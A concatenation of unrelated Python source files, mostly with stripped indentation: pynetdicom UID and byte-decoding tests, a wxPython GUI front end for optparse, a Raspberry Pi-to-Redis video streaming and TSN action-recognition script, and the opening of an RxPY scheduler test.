u'\u000A'.encode('ascii'), # \n
u'\u000C'.encode('ascii'), # \x0c
u'\u000D'.encode('ascii'), # \x0d
u'\u001B'.encode('ascii'), # \x1b
u'\u005C'.encode('ascii'), # \\
u'\u0001'.encode('ascii'), # \x01
u'\u000e'.encode('ascii'), # \x0e
1234,
45.1,
]
REFERENCE_UID = [
# UID, (enforced, non-enforced conformance)
# Invalid, invalid
('', (False, False)),
(' ' * 64, (False, False)),
('1' * 65, (False, False)),
('a' * 65, (False, False)),
# Invalid, valid
('a' * 64, (False, True)),
('0.1.2.04', (False, True)),
('some random string', (False, True)),
# Valid, valid
('1' * 64, (True, True)),
('0.1.2.4', (True, True)),
]
class TestValidateUID:
"""Tests for utils.validate_uid()."""
def setup(self):
self.default_conformance = _config.ENFORCE_UID_CONFORMANCE
def teardown(self):
_config.ENFORCE_UID_CONFORMANCE = self.default_conformance
@pytest.mark.parametrize("uid,is_valid", REFERENCE_UID)
def test_validate_uid_conformance_true(self, uid, is_valid):
_config.ENFORCE_UID_CONFORMANCE = True
assert validate_uid(UID(uid)) == is_valid[0]
@pytest.mark.parametrize("uid,is_valid", REFERENCE_UID)
def test_validate_uid_conformance_false(self, uid, is_valid):
_config.ENFORCE_UID_CONFORMANCE = False
assert validate_uid(UID(uid)) == is_valid[1]
class TestPrettyBytes:
"""Tests for utils.pretty_bytes()."""
def test_parameters(self):
"""Test parameters are correct."""
# Default
bytestream = a_associate_rq
result = pretty_bytes(bytestream)
assert len(result) == 14
assert isinstance(result[0], str)
# prefix
result = pretty_bytes(bytestream, prefix='\\x')
for line in result:
assert line[:2] == '\\x'
# delimiter
result = pretty_bytes(bytestream, prefix='', delimiter=',')
for line in result:
assert line[2] == ','
# items_per_line
result = pretty_bytes(bytestream, prefix='', delimiter='',
items_per_line=10)
assert len(result[0]) == 20
# max_size
result = pretty_bytes(bytestream, prefix='', delimiter='',
items_per_line=10, max_size=100)
assert len(result) == 11 # 10 plus the cutoff line
result = pretty_bytes(bytestream, max_size=None)
# suffix
result = pretty_bytes(bytestream, suffix='xxx')
for line in result:
assert line[-3:] == 'xxx'
def test_bytesio(self):
"""Test wrap list using bytesio"""
bytestream = BytesIO()
bytestream.write(a_associate_rq)
result = pretty_bytes(bytestream, prefix='', delimiter='',
items_per_line=10)
assert isinstance(result[0], str)
class TestMakeTarget:
"""Tests for utils.make_target()."""
def test_make_target(self):
"""Context Setup"""
from contextvars import ContextVar
foo = ContextVar("foo")
token = foo.set("foo")
"""Test for ``_config.PASS_CONTEXTVARS = False`` (the default)."""
assert _config.PASS_CONTEXTVARS is False
def target_without_context():
with pytest.raises(LookupError):
foo.get()
thread_without_context = Thread(target=make_target(target_without_context))
thread_without_context.start()
thread_without_context.join()
"""Test for ``_config.PASS_CONTEXTVARS = True``."""
_config.PASS_CONTEXTVARS = True
def target_with_context():
assert foo.get() == "foo"
thread_with_context = Thread(target=make_target(target_with_context))
thread_with_context.start()
thread_with_context.join()
_config.PASS_CONTEXTVARS = False
"""Context Teardown"""
foo.reset(token)
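# For reference, a minimal, hypothetical sketch of how a make_target() helper
# could honour ``_config.PASS_CONTEXTVARS`` (this illustrates the general
# technique and is not a copy of pynetdicom's actual implementation): when
# enabled, the caller's contextvars context is captured and the target runs
# inside that copy.
def _make_target_sketch(target):
    from contextvars import copy_context
    if _config.PASS_CONTEXTVARS:
        ctx = copy_context()  # snapshot of the calling thread's context
        return lambda *args, **kwargs: ctx.run(target, *args, **kwargs)
    return target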
@pytest.fixture
def utf8():
"""Add UTF-8 as a fallback codec"""
_config.CODECS = ('ascii', 'utf8')
yield
_config.CODECS = ('ascii', )
class TestSetUID:
"""Tests for utils.set_uid()"""
def test_str(self):
"""Test str -> UID"""
uid = set_uid('1.2.3', 'foo')
assert isinstance(uid, UID)
assert uid == '1.2.3'
def test_bytes(self):
"""Test bytes -> UID"""
b = '1.2.3'.encode('ascii')
assert isinstance(b, bytes)
uid = set_uid(b, 'foo')
assert isinstance(uid, UID)
assert uid == '1.2.3'
def test_bytes_decoding_error(self, caplog):
"""Test invalid bytes raises exception"""
b = '1.2.3'.encode('utf_32')
assert isinstance(b, bytes)
msg = (
r"Unable to decode 'FF FE 00 00 31 00 00 00 2E 00 00 00 32 00 00 "
r"00 2E 00 00 00 33 00 00 00' using the ascii codec\(s\)"
)
with caplog.at_level(logging.ERROR, logger='pynetdicom'):
with pytest.raises(ValueError, match=msg):
set_uid(b, 'foo')
assert (
"'ascii' codec can't decode byte 0xff in position 0"
) in caplog.text
def test_uid(self):
"""Test UID -> UID"""
uid = set_uid(UID('1.2.3'), 'foo')
assert isinstance(uid, UID)
assert uid == '1.2.3'
def test_invalid_raises(self, caplog):
"""Test invalid UID raises exception"""
with caplog.at_level(logging.ERROR, logger='pynetdicom'):
bad = 'abc' * 22
msg = (
f"Invalid 'foo' value '{bad}' - must not exceed 64 characters"
)
with pytest.raises(ValueError, match=msg):
uid = set_uid(bad, 'foo')
assert isinstance(uid, UID)
assert uid == bad
assert msg in caplog.text
def test_no_validation(self, caplog):
"""Test skipping validation"""
with caplog.at_level(logging.WARNING, logger='pynetdicom'):
uid = set_uid('abc' * 22, 'foo', validate=False)
assert isinstance(uid, UID)
assert uid == 'abc' * 22
assert not caplog.text
def test_valid_non_conformant_warns(self, caplog):
"""Test a valid but non-conformant UID warns"""
with caplog.at_level(logging.WARNING, logger='pynetdicom'):
uid = set_uid('1.2.03', 'foo')
assert isinstance(uid, UID)
assert uid == '1.2.03'
assert "Non-conformant 'foo' value '1.2.03'" in caplog.text
def test_none_allowed(self):
"""Test None -> None"""
uid = set_uid(None, 'foo', allow_none=True)
assert uid is None
def test_none_disallowed(self):
"""Test None raises exception"""
msg = "'foo' must be str, bytes or UID, not 'NoneType'"
with pytest.raises(TypeError, match=msg):
set_uid(None, 'foo', allow_none=False)
def test_empty_passthrough(self):
"""Test an empty value passes through validation"""
uid = set_uid('', 'foo')
assert uid == UID('')
uid = set_uid(b'', 'foo')
assert uid == UID('')
uid = set_uid(UID(''), 'foo')
assert uid == UID('')
def test_empty_raises(self):
"""Test empty raises exception"""
msg = r"Invalid 'foo' value - must not be an empty str"
with pytest.raises(ValueError, match=msg):
set_uid('', 'foo', allow_empty=False)
class TestDecodeBytes:
"""Tests for utils.decode_bytes"""
def test_decoding_error(self, caplog):
"""Test decoding error raises and logs"""
b = '1.2.3'.encode('utf_32')
with caplog.at_level(logging.ERROR, logger='pynetdicom'):
msg = (
r"Unable to decode 'FF FE 00 00 31 00 00 00 2E 00 00 00 32 "
r"00 00 00 2E 00 00 00 33 00 00 00' using the ascii codec\(s\)"
)
with pytest.raises(ValueError, match=msg):
decode_bytes(b)
assert (
"'ascii' codec can't decode byte 0xff in position 0"
) in caplog.text
def test_decoding_error_fallback(self, caplog, utf8):
"""Test decoding error raises and logs"""
b = '1.2.3'.encode('utf_32')
with caplog.at_level(logging.ERROR, logger='pynetdicom'):
msg = (
r"Unable to decode 'FF FE 00 00 31 00 00 00 2E 00 00 00 32 "
r"00 00 00 2E 00 00 00 33 00 00 00' using the ascii, "
r"utf8 codec\(s\)"
)
with pytest.raises(ValueError, match=msg):
decode_bytes(b)
assert (
"'ascii' codec can't decode byte 0xff in position 0"
) in caplog.text
assert (
"'utf-8' codec can't decode byte 0xff in position 0"
) in caplog.text
|
needswx.py
|
import sys, os, os.path, fnmatch, types, threading, time
import re, copy, io, csv, math, json
from optparse_gui import OptionParser, UserCancelledError, Progress
import optparse
from configparser import ConfigParser
import wx
from wx.lib.filebrowsebutton import FileBrowseButton
def quotedifnec(f):
if ' ' in f:
return '"%s"'%f
return f
def quotedlistifnec(lf):
retval = []
for f in lf:
retval.append(quotedifnec(f))
return " ".join(retval)
class MyFileBrowseButton( FileBrowseButton ):
def __init__(self,*args,**kw):
if 'dotfile' in kw:
self.dotfile = kw['dotfile']
del kw['dotfile']
if 'key' in kw:
self.key = kw['key']
del kw['key']
self.isdir = False
if 'isdir' in kw:
self.isdir = kw['isdir']
del kw['isdir']
super(MyFileBrowseButton,self).__init__(*args,**kw)
def createDialog( self, parent, id, pos, size, style, name="" ):
"""Setup the graphic representation of the dialog"""
wx.Panel.__init__ (self, parent, id, pos, size, style, name )
self.SetMinSize(size) # play nice with sizers
box = wx.BoxSizer(wx.HORIZONTAL)
# self.label = self.createLabel( )
# box.Add( self.label, 0, wx.CENTER )
self.textControl = self.createTextControl()
box.Add( self.textControl, 1, wx.CENTER, 5)
self.browseButton = self.createBrowseButton()
box.Add( self.browseButton, 0, wx.LEFT|wx.CENTER, 5)
self.SetAutoLayout(True)
self.SetSizer( box )
self.Layout()
if type( size ) == tuple:
size = wx.Size(*size)
self.SetSize(-1, -1, size.width, size.height, wx.SIZE_USE_EXISTING)
def OnBrowse (self, event = None):
""" Going to browse for file... """
current = self.GetValue()
s = io.StringIO(current)
rr = csv.reader(s,delimiter=' ',quotechar='"',quoting=csv.QUOTE_MINIMAL)
try:
row = next(rr)
except StopIteration:
row = []
if len(row) > 0 and os.path.exists(row[0]):
directory,current = os.path.split(row[0])
if len(row) > 1:
current = []
for r in row:
current.append(os.path.split(r)[1])
current = ' '.join(map(quotedifnec,current))
current = ""
elif hasattr(self,'dotfile') and self.dotfile:
config=ConfigParser()
if os.path.exists(self.dotfile):
config.read(self.dotfile)
if config.has_section("LastFolder") and config.has_option("LastFolder",self.key):
directory = config.get("LastFolder",self.key)
else:
directory = self.startDirectory
current = ""
else:
directory = self.startDirectory
current = ""
if self.isdir:
dlg = wx.DirDialog(self, self.dialogTitle, directory,
self.fileMode)
else:
dlg = wx.FileDialog(self, self.dialogTitle, directory, current,
self.fileMask, self.fileMode)
if dlg.ShowModal() == wx.ID_OK:
s = io.StringIO()
wr = csv.writer(s,delimiter=' ',quotechar='"',quoting=csv.QUOTE_MINIMAL)
if self.fileMode&wx.FD_MULTIPLE:
wr.writerow(dlg.GetPaths())
dir = os.path.split(dlg.GetPaths()[0])[0]
else:
wr.writerow([dlg.GetPath()])
dir = os.path.split(dlg.GetPath())[0]
self.SetValue(s.getvalue().strip())
s.close()
if hasattr(self,'dotfile') and self.dotfile:
config=ConfigParser()
if os.path.exists(self.dotfile):
config.read(self.dotfile)
if not config.has_section("LastFolder"):
config.add_section("LastFolder")
config.set("LastFolder",self.key,dir)
try:
wh = open(self.dotfile,'w')
config.write(wh)
wh.close()
except IOError:
pass
dlg.Destroy()
class OptparseDialog( wx.Dialog ):
'''The dialog presented to the user with dynamically generated controls,
to fill in the required options.
Based on the wx.Dialog sample from wx Docs & Demos'''
def __init__(
self,
option_parser, #The OptionParser object
parent = None,
ID = 0,
title = 'Program Options',
pos=wx.DefaultPosition,
size=wx.DefaultSize,
style=wx.DEFAULT_DIALOG_STYLE,
name = 'OptparseDialog',
values = None,
args = False
):
self.option_parser = option_parser
if values == None:
values = option_parser.get_defaults()
provider = wx.SimpleHelpProvider()
wx.HelpProvider.Set(provider)
wx.Dialog.__init__(self)
self.SetExtraStyle(wx.FRAME_EX_CONTEXTHELP)
self.Create(parent, ID, title, pos, size, style)
sizer = wx.BoxSizer(wx.VERTICAL)
sizer2 = wx.BoxSizer(wx.HORIZONTAL)
top_label_text = '%s %s' % ( option_parser.get_prog_name(),
option_parser.get_version() )
label = wx.StaticText(self, -1, top_label_text)
sizer2.Add(label, 0, wx.GROW|wx.ALIGN_LEFT|wx.ALL, 5)
if wx.Platform != "__WXMSW__":
sizer2.AddStretchSpacer(-1)
btn = wx.ContextHelpButton(self)
sizer2.Add(btn, 0, wx.ALL)
sizer.Add(sizer2,0, wx.GROW|wx.ALL, 5)
line = wx.StaticLine(self, -1, size=(20,-1), style=wx.LI_HORIZONTAL)
sizer.Add(line, 0, wx.GROW|wx.RIGHT|wx.TOP|wx.LEFT, 5)
nb = wx.Notebook(self, wx.ID_ANY)
self.option_controls = {}
self.option_controls.update(self.set_panel(nb,option_parser.option_list,values,'Options'))
for g in option_parser.option_groups:
self.option_controls.update(self.set_panel(nb,g.option_list,values,g.title))
if args:
self.args_ctrl = self.set_args_panel(nb,values,'Arguments')
else:
self.args_ctrl = None
sizer.Add(nb, 0, wx.GROW|wx.RIGHT|wx.TOP|wx.LEFT, 5)
line = wx.StaticLine(self, -1, size=(20,-1), style=wx.LI_HORIZONTAL)
sizer.Add(line, 0, wx.GROW|wx.RIGHT|wx.TOP|wx.LEFT, 5)
btnsizer = wx.BoxSizer(wx.HORIZONTAL)
btn = wx.Button(self, wx.ID_CANCEL)
# btn.SetHelpText("The OK button completes the dialog")
btnsizer.Add(btn,0,wx.ALL,5)
btnsizer.AddSpacer(100)
btn = wx.Button(self, wx.ID_CLEAR, label="Reset")
btn.Bind(wx.EVT_BUTTON, self.closeDialog)
btnsizer.Add(btn,0,wx.ALL,5)
btnsizer.AddSpacer(100)
btn = wx.Button(self, wx.ID_OK)
btn.SetDefault()
# btn.SetHelpText("The Cancel button cancels the dialog.")
btnsizer.Add(btn,0,wx.ALL,5)
sizer.Add(btnsizer, 0, wx.ALIGN_CENTER,wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5)
self.SetSizer(sizer)
sizer.Fit(self)
def closeDialog(self,event):
self.state = 'Reset'
self.Close()
def set_panel(self,parent,opts,values,title):
nopt = len(opts)
s = wx.FlexGridSizer(2)
p = wx.Panel(parent, -1)
parent.AddPage(p,title)
p.SetSizer(s)
return self.add_opts(opts,values,p,s)
def set_args_panel(self,parent,values,title):
s = wx.FlexGridSizer(1,2)
p = wx.Panel(parent, -1)
parent.AddPage(p,title)
p.SetSizer(s)
label = wx.StaticText(p, -1, 'Arguments' )
label.SetHelpText( 'Free-form arguments.' )
ctrl = wx.TextCtrl( p, -1, '', size = ( 300, 100 ),
style=wx.TE_MULTILINE | wx.TE_PROCESS_ENTER )
ctrl.SetHelpText(
'''Args can either be separated by a space or a newline
            Args that contain spaces must be entered like so: "arg with space"
'''
)
ctrl.Value = values['-args-']
s.Add( label, 0, wx.ALIGN_RIGHT | wx.ALL, 5 )
s.Add( ctrl, 1, wx.ALIGN_LEFT | wx.ALL, 5 )
return ctrl
def add_opts(self,opts,values,parent,sizer):
controls = {}
for option in opts:
if option.dest is None:
continue
if option.help is None:
option.help = ''
if option.name is None:
option.name = option.dest.title()
label = wx.StaticText(parent, -1, option.name )
label.SetHelpText( option.help )
sizer.Add( label, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT|wx.ALL, 5 )
if 'file' == option.type:
if not option.filetypes:
fileMask = 'All Files|*.*'
else:
fileMask = '|'.join([ "%s (%s)|%s"%(nm,ft,ft) for nm,ft in option.filetypes])
ctrl = MyFileBrowseButton(parent, -1,
size=(300, -1),
fileMode=wx.FD_OPEN|wx.FD_FILE_MUST_EXIST,
fileMask=fileMask,
startDirectory=os.getcwd(),
dotfile=self.option_parser.dotfile,
key=option.dest,
initialValue=str(values.get(option.dest,"")))
sizer.Add( ctrl, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5)
elif 'files' == option.type:
if not option.filetypes:
fileMask = 'All Files|*.*'
else:
fileMask = '|'.join([ "%s (%s)|%s"%(nm,ft,ft) for nm,ft in option.filetypes])
if isinstance(values.get(option.dest,""),str):
initStr = values.get(option.dest,"")
else:
initStr = str(' '.join(v if ' ' not in v else '"%s"'%v for v in values.get(option.dest,[])))
ctrl = MyFileBrowseButton(parent, -1,
size=(300, -1),
fileMode=wx.FD_OPEN|wx.FD_MULTIPLE|wx.FD_FILE_MUST_EXIST,
fileMask=fileMask,
startDirectory=os.getcwd(),
dotfile=self.option_parser.dotfile,
key=option.dest,
initialValue=initStr)
sizer.Add( ctrl, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5)
elif 'savefile' == option.type:
if not option.filetypes:
fileMask = 'All Files|*.*'
else:
fileMask = '|'.join([ "%s (%s)|%s"%(nm,ft,ft) for nm,ft in option.filetypes])
ctrl = MyFileBrowseButton(parent, -1,
size=(300, -1),
fileMode=wx.FD_SAVE|wx.FD_OVERWRITE_PROMPT,
fileMask=fileMask,
startDirectory=os.getcwd(),
dotfile=self.option_parser.dotfile,
key=option.dest,
initialValue=str(values.get(option.dest,"")))
sizer.Add( ctrl, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5)
elif 'savedir' == option.type:
ctrl = MyFileBrowseButton(parent, -1,
size=(300, -1),
fileMode=wx.DD_DEFAULT_STYLE,
startDirectory=os.getcwd(),
dotfile=self.option_parser.dotfile,
key=option.dest,isdir=True,
initialValue=str(values.get(option.dest,"")))
sizer.Add( ctrl, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5)
elif 'dir' == option.type:
ctrl = MyFileBrowseButton(parent, -1,
size=(300, -1),
fileMode=wx.DD_DEFAULT_STYLE|wx.DD_DIR_MUST_EXIST,
startDirectory=os.getcwd(),
dotfile=self.option_parser.dotfile,
key=option.dest,isdir=True,
initialValue=str(values.get(option.dest,"")))
sizer.Add( ctrl, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5)
elif 'store' == option.action:
if 'choice' == option.type:
if optparse.NO_DEFAULT == option.default:
option.default = option.choices[0]
ctrl = wx.ComboBox(
parent, -1, choices = option.choices,
style = wx.CB_DROPDOWN | wx.CB_READONLY,
size=(300,-1)
)
try:
ind = option.choices.index(values.get(option.dest,None))
except (ValueError,KeyError):
ind = 0
ctrl.Select(ind)
elif 'multichoice' == option.type:
if sys.platform == 'win32':
perentry = 13
pergap = 0
top = 5
bottom = 0
ysize = min(len(option.multichoices),5)*perentry + \
(min(len(option.multichoices),5)-1)*pergap + top + bottom
else:
perentry = 22
pergap = 3
ysize = min(len(option.multichoices),5)*perentry + \
(min(len(option.multichoices),5)+1)*pergap
ctrl = wx.ListBox(
parent, -1, choices = option.multichoices,
style = wx.LB_EXTENDED | \
wx.LB_HSCROLL | wx.LB_NEEDED_SB,
size = (300,ysize)
)
# print >>sys.stderr, values.get(option.dest),option.multichoices
selected = values.get(option.dest,[])
if isinstance(selected,str):
selected = selected.split(',')
for val in selected:
try:
ind = option.multichoices.index(val)
# print >>sys.stderr, val, ind
ctrl.Select(ind)
except ValueError:
continue
else:
if option.text:
ctrl = wx.TextCtrl( parent, -1, "", size = ( 300, 100 ),
style=wx.TE_MULTILINE | wx.TE_PROCESS_ENTER )
elif option.type == 'password':
ctrl = wx.TextCtrl( parent, -1, "", size=(300,-1),
style=wx.TE_PASSWORD )
else:
ctrl = wx.TextCtrl( parent, -1, "", size=(300,-1) )
if option.dest in values:
ctrl.Value = str( values[option.dest] )
sizer.Add( ctrl, 0, wx.ALIGN_LEFT|wx.ALL, 5 )
elif option.action in ( 'store_true', 'store_false' ):
ctrl = wx.CheckBox( parent, -1, "", size = ( 300, -1 ) )
if option.dest in values:
ctrl.Value = values[option.dest]
sizer.Add( ctrl, 0, wx.ALIGN_LEFT|wx.ALL, 5 )
ctrl.SetHelpText( option.help )
controls[ option ] = ctrl
return controls
def _getOptions( self ):
option_values = {}
for option, ctrl in self.option_controls.items():
if option.type == 'multichoice':
option_values[option] = ','.join([option.multichoices[i] for i in ctrl.GetSelections()])
else:
option_values[option] = ctrl.GetValue()
return option_values
def _getArgs( self ):
if self.args_ctrl == None:
return []
args_buff = self.args_ctrl.Value
args = re.findall( r'(?:((?:(?:\w|\d)+)|".*?"))\s*', args_buff )
return args
def getOptionsAndArgs( self ):
'''Returns the tuple ( options, args )
options - a dictionary of option names and values
args - a sequence of args'''
option_values = self._getOptions()
args = self._getArgs()
return option_values, args
class EmptyNotNoneOptionError (optparse.OptionError):
"""
Raised if a notNone option has no value.
"""
class UserCheckOptionError (optparse.OptionError):
"""
Raised if a user supplied values check fails.
"""
class OptionParserGUI( OptionParser ):
def __init__( self, *args, **kwargs ):
if wx.GetApp() is None:
self.app = wx.App( False )
self.args = False
if 'args' in kwargs:
self.args = kwargs['args']
del kwargs['args']
dotfile = None
if 'dotfile' in kwargs:
dotfile = kwargs['dotfile']
del kwargs['dotfile']
OptionParser.__init__( self, *args, **kwargs )
self.dotfile = self.find_dotfile(dotfile)
def find_dotfile(self,base=None):
if not base:
base = self.get_prog_name()
if 'HOMEPATH' in os.environ and 'HOMEDRIVE' in os.environ:
home = os.environ['HOMEDRIVE'] + os.environ['HOMEPATH']
elif 'HOME' in os.environ:
home = os.environ['HOME']
else:
raise RuntimeError("Can't find home directory!")
if base.endswith('.exe'):
dotfile = base[:-4]+'.ini'
elif base.endswith('.py'):
dotfile = base[:-3]+'.ini'
else:
dotfile = base+'.ini'
return os.path.join(home,"."+dotfile)
def parse_args( self, args = None, values = None, opts = None ):
'''
This is the heart of it all - overrides optparse.OptionParser.parse_args
        @param args is irrelevant and thus ignored,
        it's here only for interface compatibility
'''
if opts != None:
initvals = {}
for g,o in self.iteropts():
# print repr(g),repr(o),o.dest
if o.dest and hasattr(opts,o.dest):
initvals[o.dest] = getattr(opts,o.dest)
set_values = initvals
else:
set_values = None
if opts == None:
config=ConfigParser()
if os.path.exists(self.dotfile):
config.read(self.dotfile)
if not config.has_section("VERSION") or config.get("VERSION","VERSION") != self.version:
os.unlink(self.dotfile)
config=ConfigParser()
if config.has_section("LastValue"):
for g,o in self.iteropts():
if o.dest and o.remember and config.has_option("LastValue",o.dest):
if set_values == None:
set_values = {}
value = json.loads(config.get("LastValue",o.dest))
if o.type == 'multichoice':
set_values[o.dest] = value.split(',')
elif o.type in ('savefile','savedir','file'):
set_values[o.dest] = quotedifnec(value)
elif o.type in ('files',):
set_values[o.dest] = quotedlistifnec(value)
else:
set_values[o.dest] = value
good = False
while not good:
good = True
dlg = OptparseDialog( option_parser = self, values = set_values, args = self.args )
dlg.state = None
dlg_result = dlg.ShowModal()
if dlg_result == wx.ID_CANCEL and dlg.state == None:
raise UserCancelledError( 'User has canceled' )
if dlg_result == wx.ID_CANCEL and dlg.state == 'Reset':
good = False
if os.path.exists(self.dotfile):
os.unlink(self.dotfile)
set_values = None
continue
assert dlg_result == wx.ID_OK
if values is None:
values = self.get_default_values()
option_values, args = dlg.getOptionsAndArgs()
set_values = {'-args-':''}
for option, value in option_values.items():
set_values[option.dest] = value
if dlg.args_ctrl:
set_values['-args-'] = dlg.args_ctrl.Value
optmap = {}
for option in self.option_list:
optmap[str(option)] = option
for gr in self.option_groups:
for option in gr.option_list:
optmap[str(option)] = option
for option, value in option_values.items():
if option.action in ('store_true','store_false'):
setattr( values, option.dest, value )
continue
if option.takes_value() is False:
value = None
if isinstance(value,str):
value = str(value)
if option.notNone and (value == None or value == ''):
self.error("%s: notNone option is empty"%(option,),
option,exit=False)
good = False
break
try:
option.process( option, value, values, self )
except optparse.OptionValueError as e:
self.error(e.msg,option,exit=False)
good = False
break
config=ConfigParser()
if os.path.exists(self.dotfile):
config.read(self.dotfile)
if not config.has_section("LastValue"):
config.add_section("LastValue")
if not config.has_section("VERSION"):
config.add_section("VERSION")
config.set("VERSION","VERSION",self.version)
for g,o in self.iteropts():
if o.remember:
if getattr(values,o.dest) not in (None,""):
config.set("LastValue",o.dest,json.dumps(getattr(values,o.dest)))
else:
config.remove_option("LastValue",o.dest)
try:
wh = open(self.dotfile,'w')
config.write(wh)
wh.close()
except IOError:
pass
return values, args
def error( self, msg, option=None, exit=True):
msg = re.sub(r"u'","'",msg)
if ':' in msg:
msg = msg.split(':',1)[1].strip()
if option:
msg = option.name+": "+msg
dlg = wx.MessageDialog( None, msg, 'Error!', wx.ICON_ERROR )
dlg.ShowModal()
if exit:
sys.exit(2)
return
class ProgressGUI(Progress):
def __init__(self,title,*args,**kwargs):
super(ProgressGUI,self).__init__(*args,**kwargs)
self.title = title
self.dialog = None
self.lock = threading.Lock()
def init(self,message):
if wx.GetApp() is None:
self.app = wx.App( False )
if self.dialog:
return
args = (self.title,message+" "*(60-len(message)), 1001)
t = threading.Thread(target=self.start, args=args)
t.start()
while True:
self.lock.acquire()
if self.dialog:
self.lock.release()
break
self.lock.release()
time.sleep(1)
def start(self,*args):
self.lock.acquire()
self.dialog = wx.ProgressDialog(style=0,*args)
self.lock.release()
def initprogressbar(self, message):
self.init(message)
self.updateprogressbar(0)
# self.dialog.Update(0,message)
def initbar(self, message):
self.init(message)
self.updatebar()
# self.dialog.Update(0,message)
def updateprogressbar(self,value):
self.dialog.Update(value)
def updatebar(self):
self.dialog.Pulse()
|
rpc_video_h264_streaming.py
|
import time
from queue import Queue
from data_sender import send
import argparse
from threading import Thread, Event
import cv2
import numpy as np
from redis import Redis
import pickle
import torch
from models import TSN
from baseline_rpc_rgb import make_ucf, make_infer, make_hmdb
from sklearn.metrics import confusion_matrix
import os
#### DEVICE ####
def streaming(video_path=None, need_stop=None):
    # The caller starts this in a Thread with (args.video_path, need_stop);
    # accept those arguments here (currently unused) so the thread does not
    # crash with a TypeError.
    import picamera  # imported lazily: picamera is only available on the Pi device
    while True:
        with picamera.PiCamera() as camera:
camera.resolution = (224, 224)
camera.framerate = 40
camera.start_recording('./device-video/1.h264')
camera.wait_recording(2)
counter = 1
while True:
counter += 1
camera.split_recording('./device-video/%d.h264' % counter)
camera.wait_recording(2)
camera.stop_recording()
#### DEVICE ####
def data_send():
counter = 0
while True:
LIST_DIR = os.listdir('./device-video')
SORTED_DIR = [ int(x.split('.')[0]) for x in LIST_DIR]
SORTED_DIR.sort()
SORTED_DIR = [ str(x) + '.h264' for x in SORTED_DIR]
LENGTH = len(LIST_DIR)
if LENGTH > 1 and LENGTH > counter:
item = SORTED_DIR[counter]
PATH = os.path.join('/home/pi/venv/video', item)
read_file = open(PATH, 'rb')
encoding = read_file.read()
if encoding != b'':
send('Frame', encoding)
counter += 1
#### HUB ####
def receive_and_save(rgb_net, redis):
counter = 1
frames_to_run = []
while True:
initial_time = time.time()
if redis.llen('Frame') > 0:
start_redis = time.time()
incoming_video = redis.lpop('Frame')
stop_redis = time.time()
print("TYPE OF FRAME: ", type(incoming_video), "Popping Time: ", stop_redis-start_redis)
start_load = time.time()
video = pickle.loads(incoming_video)
end_load = time.time()
f = open('./video/%d.h264'%counter, 'wb+')
opened = time.time()
f.write(video)
write_file = time.time()
#f.write(video.encode('utf-8'))
print("[Pickle Loading Time: ]", end_load-start_load)
print("[Video Open Time: ]", opened-end_load)
print("[Video Write Time: ]", write_file - opened)
counter += 1
#### HUB ####
def read_file_and_run():
counter = 0
while True:
LIST_DIR = sorted(os.listdir('./video'))
SORTED_DIR = [ int(x.split('.')[0]) for x in LIST_DIR]
SORTED_DIR.sort()
SORTED_DIR = [ str(x) + '.h264' for x in SORTED_DIR ]
LENGTH = len(LIST_DIR)
if LENGTH > 1 and LENGTH > counter:
item = SORTED_DIR[counter]
PATH = os.path.join('./video', item)
start_capture = time.time()
cap = cv2.VideoCapture(PATH)
end_capture = time.time()
print("[VIDEO CAPTURE OF ", item, end_capture-start_capture)
counter += 1
tmp_stack_frames = []
before_opening_cap = time.time()
while cap.isOpened():
ret, frame = cap.read()
new_frame = time.time()
if ret == True:
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
tmp_stack_frames.append(frame)
append_frame = time.time()
print("[APPENDING ONE FRAME EACH]: ", append_frame-new_frame)
else:
print("DONE READING ", item)
ready_to_infer = time.time()
rst = make_infer(args.rgb_weights, tmp_stack_frames[1:], rgb_net, 'RGB', args.test_segments, num_class)
inferred = time.time()
print("[TIME WHEN ALL FRAMES ARE READY]:{}, [INF TIME]: {}".format(ready_to_infer-before_opening_cap, inferred-ready_to_infer))
tmp_rst = np.argmax(np.mean(rst, axis=0))
print(make_hmdb()[tmp_rst])
break
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Sending streaming images from pi to hub')
parser.add_argument('--video_path', type=str)
parser.add_argument('--hub_device', type=str, help='Specify where this will be run')
parser.add_argument('--rgb_weights', type=str)
parser.add_argument('--dataset', type=str, default='ucf101')
parser.add_argument('--arch', type=str, default='BNInception')
parser.add_argument('--crop_fusion_type', type=str, default='avg', choices=['avg', 'max', 'topk'])
parser.add_argument('--dropout', type=float, default=0.7)
parser.add_argument('--test_segments', type=int, default=5)
args = parser.parse_args()
if args.dataset == 'ucf101':
num_class = 101
elif args.dataset == 'hmdb51':
num_class = 51
else:
        raise ValueError('Unknown dataset: ' + args.dataset)
rgb_net = TSN(num_class, 1, 'RGB',
base_model=args.arch,
consensus_type=args.crop_fusion_type,
dropout=args.dropout)
rgb_checkpoint = torch.load(args.rgb_weights)
print("model epoch {} best prec@1: {}".format(rgb_checkpoint['epoch'], rgb_checkpoint['best_prec1']))
base_dict = {'.'.join(k.split('.')[1:]): v for k,v in list(rgb_checkpoint['state_dict'].items())}
rgb_net.load_state_dict(base_dict)
output = []
label = []
redis_queue = Queue()
need_stop = Event()
host_address = '147.46.219.146'
redis = Redis(host_address)
redis.flushall()
if args.hub_device == 'Hub':
import shutil
shutil.rmtree('./video')
os.mkdir('./video')
jobs = [ Thread(target=receive_and_save, args=(rgb_net, redis)),
Thread(target=read_file_and_run)]
else:
jobs = [ Thread(target=streaming, args=(args.video_path, need_stop))]
[job.start() for job in jobs]
[job.join() for job in jobs]
print("Terminating..")
if args.hub_device == 'Hub':
cf = confusion_matrix(label, output).astype(float)
cls_cnt = cf.sum(axis=1)
cls_hit = np.diag(cf)
print("CLS CNT, HIT", cls_cnt, cls_hit)
cls_acc = cls_hit / cls_cnt
print('Accuracy {:.02f}%'.format(np.mean(cls_acc) * 100))
|
test_immediatescheduler.py
|
import pytest
import unittest
import threading
from datetime import timedelta
from time import sleep
from rx.disposable import Disposable
from rx.scheduler import ImmediateScheduler
from rx.internal.basic import default_now
from rx.internal.constants import DELTA_ZERO
from rx.internal.exceptions import WouldBlockException
class TestImmediateScheduler(unittest.TestCase):
def test_immediate_singleton(self):
scheduler = [
ImmediateScheduler(),
